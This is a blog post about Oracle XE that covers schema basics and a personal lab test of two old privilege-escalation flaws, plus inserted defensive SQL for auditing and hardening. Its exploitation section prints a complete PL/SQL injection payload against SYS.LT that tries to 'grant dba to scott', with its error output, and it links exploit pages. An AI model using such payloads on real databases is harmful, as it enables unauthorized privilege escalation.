Saturday, October 30, 2010

Oracle XE Express Edition

Recently I have had to deal with Oracle XE (Express Edition), and it is the right time to take some notes down after doing tons of reading about the topic, especially the long study to work out the differences between Oracle and Oracle XE.

Introduction
How to check the version number of an Oracle database?
(a) Use OUI (Oracle Universal Installer)
(b) select * from v$version;

What Is the Relation of a User Account and a Schema?
User accounts and schemas have a one-to-one relation. When you create a user, you are also implicitly creating a schema for that user. A schema is a logical container for the database objects (such as tables, views, triggers, and so on) that the user creates. The schema name is the same as the user name, and can be used to unambiguously refer to objects owned by the user.
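The following script is an added illustration of the user/schema relation described above; it is not from the original post. The account name app_user, its password, the report_user account and the orders table are all made-up values, and the script is meant to be run from SQL*Plus as a privileged account such as SYSTEM.

```sql
-- Added example (not from the original post): create a user, watch the objects it
-- creates land in a schema of the same name, and grant only what the user needs.
-- app_user, its password, report_user and the orders table are made-up names.
-- Run as a privileged account such as SYSTEM.
CREATE USER app_user IDENTIFIED BY "ChangeMe_1"
  DEFAULT TABLESPACE users
  QUOTA 10M ON users;                 -- quota caps how much storage the schema may consume

-- Least privilege: allow login and table creation only, no DBA or RESOURCE role.
GRANT CREATE SESSION, CREATE TABLE TO app_user;

-- Creating a user implicitly created the schema APP_USER; objects are placed in it
-- by schema-qualifying the name (or by connecting as app_user and omitting it).
CREATE TABLE app_user.orders (id NUMBER PRIMARY KEY, amount NUMBER);

-- Confirm ownership: the OWNER column carries the schema name, which equals the user name.
SELECT owner, object_name, object_type
  FROM all_objects
 WHERE object_name = 'ORDERS';

-- Any other account refers to the table unambiguously through its schema.
SELECT COUNT(*) FROM app_user.orders;

-- Other users see nothing in this schema until the owner (or a DBA) grants access;
-- object-level grants are the controlled way to widen it. report_user is assumed to exist.
GRANT SELECT ON app_user.orders TO report_user;
```

The point of the QUOTA and the narrow GRANT is that a freshly created user should be able to do exactly what its application requires and nothing more; the schema boundary then tells you precisely which account owns, and is accountable for, each object.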

Exploitation
1. CVE-2009-0981 Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Vulnerability
After the installation of a fresh Oracle XE, I tried to play with the CVE-2009-0981 Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection vulnerability. The exploit code is from http://www.red-database-security.com/exploits/oracle_sys_lt_compressworkspacetree2.html.

The issue is an input sanitisation flaw in the COMPRESSWORKSPACETREE procedure: code can be injected into the procedure, and privilege escalation succeeds. The procedure is owned by SYS or WMSYS.

The result was always a failure for me after several tries.
C:\Users>sqlplus

SQL*Plus: Release 10.2.0.1.0 - Production on Sat Oct 30 23:57:21 2010

Copyright (c) 1982, 2005, Oracle. All rights reserved.

Enter user-name: user1
Enter password:

Connected to:
Oracle Database 10g Express Edition Release 10.2.0.1.0 - Production

SQL> DECLARE
2 D NUMBER;
3 BEGIN
4 D := DBMS_SQL.OPEN_CURSOR;
5 DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction;
begin execute immediate ''grant dba to scott'';commit;end;',0);
6 SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
7 SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
8 end;
9 /
SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
*
ERROR at line 6:
ORA-06550: line 6, column 1:
PLS-00201: identifier 'SYS.LT' must be declared
ORA-06550: line 6, column 1:
PL/SQL: Statement ignored
ORA-06550: line 7, column 1:
PLS-00201: identifier 'SYS.LT' must be declared
ORA-06550: line 7, column 1:
PL/SQL: Statement ignored

After some time on Google, I realised there are big differences between Oracle Standard Edition and XE; see http://www.dba-oracle.com/t_xe_features_oracle_express.htm. In this case, the COMPRESSWORKSPACETREE procedure belongs to the LT package under Oracle Workspace Manager. Unfortunately, Oracle Workspace Manager does not exist in Oracle XE! This is why the exploit failed: the vulnerability does not even exist in Oracle XE.

Clear. Let's move on!

2. SQL Injection via Oracle DBMS_EXPORT_EXTENSION in Oracle 9i / 10g
The vulnerability was found in 2006 and I guess it can't be found in the wild now. But the good news is that Oracle never released any Critical Patch Update (CPU) for Oracle XE. So this vulnerability exists and the exploit worked well!

For further details about this issue, please refer to http://www.red-database-security.com/exploits/oracle-sql-injection-oracle-dbms_export_extension.html
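The following script is an added example, not from the original post or from the linked exploit pages, showing the checks a defender would run against an XE instance to confirm the two observations above (Workspace Manager absent, DBMS_EXPORT_EXTENSION present and reachable) and the compensating control that replaces the missing patch. It assumes a SYS or SYSTEM session; the component id 'OWM' is the registry entry for Oracle Workspace Manager.

```sql
-- Added example (not from the original post): assess and harden an Oracle XE
-- instance with respect to the two packages discussed above. Run as SYS or SYSTEM.

-- 1. Is Oracle Workspace Manager installed? According to the post it is absent
--    from XE, so this should return no rows, which explains the PLS-00201
--    "identifier 'SYS.LT' must be declared" error in the session above.
SELECT comp_id, comp_name, version, status
  FROM dba_registry
 WHERE comp_id = 'OWM';

-- The same question asked of the object catalogue: does the LT package exist at all?
SELECT owner, object_name, object_type, status
  FROM dba_objects
 WHERE object_name = 'LT'
   AND object_type IN ('PACKAGE', 'PACKAGE BODY');

-- 2. DBMS_EXPORT_EXTENSION does ship with XE. Who may execute it?
--    A row with GRANTEE = 'PUBLIC' means every account, however low-privileged,
--    can reach the vulnerable package.
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_EXPORT_EXTENSION';

-- 3. With no Critical Patch Update available for XE, the compensating control is to
--    take the package away from PUBLIC. Accounts that genuinely need it (e.g. the
--    one running the export tooling) can be granted EXECUTE individually afterwards.
REVOKE EXECUTE ON SYS.DBMS_EXPORT_EXTENSION FROM PUBLIC;

-- 4. Re-check: the PUBLIC row should be gone.
SELECT grantee, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_EXPORT_EXTENSION';

-- 5. Record the exact release alongside the finding (the version check from the introduction).
SELECT banner FROM v$version;
```

Test the revoke in a non-production copy first, since the export utilities rely on this package; the safe pattern is to revoke from PUBLIC and then grant EXECUTE only to the specific account that runs exports.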

My favourites

To summarise the Oracle exploitation methodology, these are my favourites and among the most comprehensive cheat sheets:
http://www.red-database-security.com/wp/oracle_cheat.pdf
http://www.red-database-security.com/wp/hacking_and_hardening_oracle_XE.pdf
